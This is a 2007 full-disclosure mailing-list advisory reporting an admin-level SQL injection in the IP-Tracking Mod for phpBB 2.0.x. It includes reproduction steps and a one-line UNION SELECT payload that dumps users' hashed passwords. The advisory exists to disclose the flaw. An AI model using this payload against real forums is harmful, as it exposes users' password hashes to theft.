lists.openwall.net: Open Source and information security mailing list archives
Message-ID: <465089D6.8040601@gmx.de>
Date: Sun, 20 May 2007 19:48:06 +0200
From: Cornelius Riemenschneider <c.r1@....de>
To: bugtraq@...urityfocus.com,  full-disclosure@...ts.grok.org.uk
Subject: SQL-Injection in IP-TRACKING Mod for phpBB2.0.x

Information: The IP-Tracking Mod is an extension for phpBB 2.0.x which
logs all page hits that users of the board make, including referer, IP and
username. It contains an SQL injection at admin level. You can get it
from:
http://www.phpbb.de/viewtopic.php?t=63690&postdays=0&postorder=asc&start=0

Steps to reproduce: Go into your ACP, select IP-Search under IP-Tracking,
select "no" for "use wildcards" and enter whatever you want in Search Query.
It is passed directly into the query. As Search Type I used IP.

PoC: enter
' UNION SELECT user_password as ip,user_id,username,user_active,user_regdate,user_level,user_posts from phpbb_users#
as Search Query. This will display all the hashed user passwords in the IP column.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
